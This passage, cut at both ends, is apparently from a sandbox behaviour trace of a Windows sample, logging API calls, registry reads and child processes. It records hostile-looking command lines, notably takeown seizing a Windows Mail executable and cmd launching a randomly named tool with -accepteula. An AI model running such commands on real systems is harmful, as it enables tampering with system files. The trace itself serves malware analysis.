NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0221.811] GetProcessHeap () returned 0x510000 [0221.811] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x120) returned 0x5227f8 [0221.811] GetProcessHeap () returned 0x510000 [0221.811] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x238) returned 0x522920 [0221.824] GetConsoleTitleW (in: lpConsoleTitle=0x22f01c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0222.290] InitializeProcThreadAttributeList (in: lpAttributeList=0x22eea4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22ef6c | out: lpAttributeList=0x22eea4, lpSize=0x22ef6c) returned 1 [0222.290] UpdateProcThreadAttribute (in: lpAttributeList=0x22eea4, dwFlags=0x0, Attribute=0x60001, lpValue=0x22ef64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22eea4, lpPreviousValue=0x0) returned 1 [0222.290] GetStartupInfoW (in: lpStartupInfo=0x22ee60 | out: lpStartupInfo=0x22ee60*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x80, hStdError=0xb)) [0222.312] CloseHandle (hObject=0x74) returned 1 [0222.312] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0222.312] GetProcessHeap () returned 0x510000 [0222.312] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x522d58 | out: hHeap=0x510000) returned 1 [0222.312] GetEnvironmentStringsW () returned 0x522b30* [0222.313] GetProcessHeap () returned 0x510000 [0222.313] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xb7e) returned 0x527278 [0222.313] FreeEnvironmentStringsW (penv=0x522b30) returned 1 [0222.313] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0225.297] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x22ee40 | out: lpExitCode=0x22ee40*=0x1) returned 1 [0225.297] CloseHandle (hObject=0x78) returned 1 [0225.298] _vsnwprintf (in: _Buffer=0x22ef88, _BufferCount=0x13, _Format="%08X", _ArgList=0x22ee4c | out: _Buffer="00000001") returned 8 [0225.298] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0225.298] GetProcessHeap () returned 0x510000 [0225.298] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x527278 | out: hHeap=0x510000) returned 1 [0225.298] GetEnvironmentStringsW () returned 0x522b30* [0225.298] GetProcessHeap () returned 0x510000 [0225.298] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xb7e) returned 0x527278 [0225.298] FreeEnvironmentStringsW (penv=0x522b30) returned 1 [0225.298] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0225.298] GetProcessHeap () returned 0x510000 [0225.299] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x527278 | out: hHeap=0x510000) returned 1 [0225.299] GetEnvironmentStringsW () returned 0x522b30* [0225.299] GetProcessHeap () returned 0x510000 [0225.299] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xb7e) returned 0x527278 [0225.299] FreeEnvironmentStringsW (penv=0x522b30) returned 1 [0225.299] GetProcessHeap () returned 0x510000 [0225.299] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5200b0 | out: hHeap=0x510000) returned 1 [0225.299] DeleteProcThreadAttributeList (in: lpAttributeList=0x22eea4 | out: lpAttributeList=0x22eea4) [0225.299] _get_osfhandle (_FileHandle=1) returned 0x80 [0225.299] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0225.299] _get_osfhandle (_FileHandle=1) returned 0x80 [0225.300] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0225.300] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.300] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0225.300] SetConsoleInputExeNameW () returned 0x1 [0225.301] GetConsoleOutputCP () returned 0x1b5 [0225.301] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0225.301] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.301] exit (_Code=1) Process: id = "227" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x1c7ca000" os_pid = "0xb68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "194" os_parent_pid = "0x494" cmd_line = "takeown /F \"C:\\Program Files\\Windows Mail\\told.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 815 os_tid = 0x72c Process: id = "228" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x2a276000" os_pid = "0x85c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\WerSvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:000743d3" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 816 os_tid = 0xb20 Thread: id = 819 os_tid = 0x284 Thread: id = 820 os_tid = 0x7b0 Thread: id = 821 os_tid = 0x30c Thread: id = 825 os_tid = 0xa70 Thread: id = 827 os_tid = 0x708 Process: id = "229" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2b077000" os_pid = "0x570" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "186" os_parent_pid = "0xaec" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"Month_Calendar.jtp\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 818 os_tid = 0x92c [0224.169] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3bfc2c | out: lpSystemTimeAsFileTime=0x3bfc2c*(dwLowDateTime=0x3d6e6080, dwHighDateTime=0x1d68287)) [0224.169] GetCurrentProcessId () returned 0x570 [0224.169] GetCurrentThreadId () returned 0x92c [0224.169] GetTickCount () returned 0x1163c65 [0224.169] QueryPerformanceCounter (in: lpPerformanceCount=0x3bfc24 | out: lpPerformanceCount=0x3bfc24*=34450808374) returned 1 [0224.170] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0224.170] __set_app_type (_Type=0x1) [0224.170] __p__fmode () returned 0x770331f4 [0224.170] __p__commode () returned 0x770331fc [0224.171] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0224.171] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0224.171] GetCurrentThreadId () returned 0x92c [0224.171] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x92c) returned 0x60 [0224.171] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0224.171] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0224.171] SetThreadUILanguage (LangId=0x0) returned 0x409 [0224.185] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0224.185] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3bfbbc | out: phkResult=0x3bfbbc*=0x0) returned 0x2 [0224.186] VirtualQuery (in: lpAddress=0x3bfbf3, lpBuffer=0x3bfb8c, dwLength=0x1c | out: lpBuffer=0x3bfb8c*(BaseAddress=0x3bf000, AllocationBase=0x2c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0224.186] VirtualQuery (in: lpAddress=0x2c0000, lpBuffer=0x3bfb8c, dwLength=0x1c | out: lpBuffer=0x3bfb8c*(BaseAddress=0x2c0000, AllocationBase=0x2c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0224.186] VirtualQuery (in: lpAddress=0x2c1000, lpBuffer=0x3bfb8c, dwLength=0x1c | out: lpBuffer=0x3bfb8c*(BaseAddress=0x2c1000, AllocationBase=0x2c0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0224.186] VirtualQuery (in: lpAddress=0x2c3000, lpBuffer=0x3bfb8c, dwLength=0x1c | out: lpBuffer=0x3bfb8c*(BaseAddress=0x2c3000, AllocationBase=0x2c0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0224.186] VirtualQuery (in: lpAddress=0x3c0000, lpBuffer=0x3bfb8c, dwLength=0x1c | out: lpBuffer=0x3bfb8c*(BaseAddress=0x3c0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xd0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0224.186] GetConsoleOutputCP () returned 0x1b5 [0224.187] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0224.187] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0224.187] _get_osfhandle (_FileHandle=1) returned 0x80 [0224.187] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0224.191] _get_osfhandle (_FileHandle=1) returned 0x80 [0224.191] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0224.200] _get_osfhandle (_FileHandle=0) returned 0x3 [0224.200] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0224.202] GetEnvironmentStringsW () returned 0x5f2208* [0224.202] GetProcessHeap () returned 0x5e0000 [0224.202] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0xb8c) returned 0x5f2da0 [0224.202] FreeEnvironmentStringsW (penv=0x5f2208) returned 1 [0224.202] GetProcessHeap () returned 0x5e0000 [0224.202] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x4) returned 0x5eec08 [0224.202] GetEnvironmentStringsW () returned 0x5f2208* [0224.202] GetProcessHeap () returned 0x5e0000 [0224.202] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0xb8c) returned 0x5f3938 [0224.202] FreeEnvironmentStringsW (penv=0x5f2208) returned 1 [0224.203] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3beb2c | out: phkResult=0x3beb2c*=0x68) returned 0x0 [0224.203] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3beb34, lpData=0x3beb38, lpcbData=0x3beb30*=0x1000 | out: lpType=0x3beb34*=0x0, lpData=0x3beb38*=0x0, lpcbData=0x3beb30*=0x1000) returned 0x2 [0224.203] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3beb34, lpData=0x3beb38, lpcbData=0x3beb30*=0x1000 | out: lpType=0x3beb34*=0x4, lpData=0x3beb38*=0x1, lpcbData=0x3beb30*=0x4) returned 0x0 [0224.203] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3beb34, lpData=0x3beb38, lpcbData=0x3beb30*=0x1000 | out: lpType=0x3beb34*=0x0, lpData=0x3beb38*=0x1, lpcbData=0x3beb30*=0x1000) returned 0x2 [0224.203] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3beb34, lpData=0x3beb38, lpcbData=0x3beb30*=0x1000 | out: lpType=0x3beb34*=0x4, lpData=0x3beb38*=0x0, lpcbData=0x3beb30*=0x4) returned 0x0 [0224.203] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3beb34, lpData=0x3beb38, lpcbData=0x3beb30*=0x1000 | out: lpType=0x3beb34*=0x4, lpData=0x3beb38*=0x40, lpcbData=0x3beb30*=0x4) returned 0x0 [0224.203] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3beb34, lpData=0x3beb38, lpcbData=0x3beb30*=0x1000 | out: lpType=0x3beb34*=0x4, lpData=0x3beb38*=0x40, lpcbData=0x3beb30*=0x4) returned 0x0 [0224.203] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3beb34, lpData=0x3beb38, lpcbData=0x3beb30*=0x1000 | out: lpType=0x3beb34*=0x0, lpData=0x3beb38*=0x40, lpcbData=0x3beb30*=0x1000) returned 0x2 [0224.203] RegCloseKey (hKey=0x68) returned 0x0 [0224.203] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3beb2c | out: phkResult=0x3beb2c*=0x68) returned 0x0 [0224.203] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3beb34, lpData=0x3beb38, lpcbData=0x3beb30*=0x1000 | out: lpType=0x3beb34*=0x0, lpData=0x3beb38*=0x40, lpcbData=0x3beb30*=0x1000) returned 0x2 [0224.203] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3beb34, lpData=0x3beb38, lpcbData=0x3beb30*=0x1000 | out: lpType=0x3beb34*=0x4, lpData=0x3beb38*=0x1, lpcbData=0x3beb30*=0x4) returned 0x0 [0224.203] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3beb34, lpData=0x3beb38, lpcbData=0x3beb30*=0x1000 | out: lpType=0x3beb34*=0x0, lpData=0x3beb38*=0x1, lpcbData=0x3beb30*=0x1000) returned 0x2 [0224.203] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3beb34, lpData=0x3beb38, lpcbData=0x3beb30*=0x1000 | out: lpType=0x3beb34*=0x4, lpData=0x3beb38*=0x0, lpcbData=0x3beb30*=0x4) returned 0x0 [0224.203] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3beb34, lpData=0x3beb38, lpcbData=0x3beb30*=0x1000 | out: lpType=0x3beb34*=0x4, lpData=0x3beb38*=0x9, lpcbData=0x3beb30*=0x4) returned 0x0 [0224.204] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3beb34, lpData=0x3beb38, lpcbData=0x3beb30*=0x1000 | out: lpType=0x3beb34*=0x4, lpData=0x3beb38*=0x9, lpcbData=0x3beb30*=0x4) returned 0x0 [0224.204] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3beb34, lpData=0x3beb38, lpcbData=0x3beb30*=0x1000 | out: lpType=0x3beb34*=0x0, lpData=0x3beb38*=0x9, lpcbData=0x3beb30*=0x1000) returned 0x2 [0224.204] RegCloseKey (hKey=0x68) returned 0x0 [0224.204] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2f9 [0224.204] srand (_Seed=0x5f51e2f9) [0224.204] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"Month_Calendar.jtp\" -nobanner" [0224.204] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"Month_Calendar.jtp\" -nobanner" [0224.204] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0224.205] GetProcessHeap () returned 0x5e0000 [0224.205] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x210) returned 0x5f44d0 [0224.205] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5f44d8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0224.205] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0224.205] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0224.205] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0224.205] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0224.205] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0224.205] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0224.206] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0224.206] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0224.206] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0224.206] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0224.206] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0224.206] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0224.206] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0224.206] GetProcessHeap () returned 0x5e0000 [0224.206] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x54) returned 0x5f46e8 [0224.206] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3bf8f8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0224.206] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x3bf8f8, lpFilePart=0x3bf8f4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf8f4*="Desktop") returned 0x25 [0224.206] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0224.206] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3bf674 | out: lpFindFileData=0x3bf674*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5f2088 [0224.206] FindClose (in: hFindFile=0x5f2088 | out: hFindFile=0x5f2088) returned 1 [0224.206] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3bf674 | out: lpFindFileData=0x3bf674*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x5f2088 [0224.206] FindClose (in: hFindFile=0x5f2088 | out: hFindFile=0x5f2088) returned 1 [0224.206] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0224.207] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3bf674 | out: lpFindFileData=0x3bf674*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5f2088 [0224.207] FindClose (in: hFindFile=0x5f2088 | out: hFindFile=0x5f2088) returned 1 [0224.207] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0224.207] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0224.207] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0224.207] GetProcessHeap () returned 0x5e0000 [0224.207] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f2da0 | out: hHeap=0x5e0000) returned 1 [0224.207] GetEnvironmentStringsW () returned 0x5f2208* [0224.207] GetProcessHeap () returned 0x5e0000 [0224.207] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0xb8c) returned 0x5f2da0 [0224.207] FreeEnvironmentStringsW (penv=0x5f2208) returned 1 [0224.207] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0224.207] GetProcessHeap () returned 0x5e0000 [0224.207] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f46e8 | out: hHeap=0x5e0000) returned 1 [0224.207] GetProcessHeap () returned 0x5e0000 [0224.207] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400e) returned 0x5f4f48 [0224.208] GetProcessHeap () returned 0x5e0000 [0224.208] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x7c) returned 0x5f2208 [0224.208] GetProcessHeap () returned 0x5e0000 [0224.208] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4f48 | out: hHeap=0x5e0000) returned 1 [0224.208] GetConsoleOutputCP () returned 0x1b5 [0224.209] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0224.209] GetUserDefaultLCID () returned 0x409 [0224.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0224.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3bfa38, cchData=128 | out: lpLCData="0") returned 2 [0224.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3bfa38, cchData=128 | out: lpLCData="0") returned 2 [0224.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3bfa38, cchData=128 | out: lpLCData="1") returned 2 [0224.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0224.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0224.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0224.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0224.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0224.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0224.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0224.210] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0224.210] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0224.210] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0224.210] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0224.211] GetProcessHeap () returned 0x5e0000 [0224.211] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20c) returned 0x5f2290 [0224.211] GetConsoleTitleW (in: lpConsoleTitle=0x5f2290, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0224.212] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0224.212] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0224.212] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0224.213] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0224.213] GetProcessHeap () returned 0x5e0000 [0224.213] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400a) returned 0x5f4f48 [0224.213] GetProcessHeap () returned 0x5e0000 [0224.213] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4f48 | out: hHeap=0x5e0000) returned 1 [0224.214] _wcsicmp (_String1="tdq963ii.exe", _String2=")") returned 75 [0224.215] _wcsicmp (_String1="FOR", _String2="tdq963ii.exe") returned -14 [0224.215] _wcsicmp (_String1="FOR/?", _String2="tdq963ii.exe") returned -14 [0224.215] _wcsicmp (_String1="IF", _String2="tdq963ii.exe") returned -11 [0224.215] _wcsicmp (_String1="IF/?", _String2="tdq963ii.exe") returned -11 [0224.215] _wcsicmp (_String1="REM", _String2="tdq963ii.exe") returned -2 [0224.215] _wcsicmp (_String1="REM/?", _String2="tdq963ii.exe") returned -2 [0224.215] GetProcessHeap () returned 0x5e0000 [0224.215] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x58) returned 0x5f46e8 [0224.215] GetProcessHeap () returned 0x5e0000 [0224.215] RtlAllocateHeap (HeapHandle=0x5e0000, 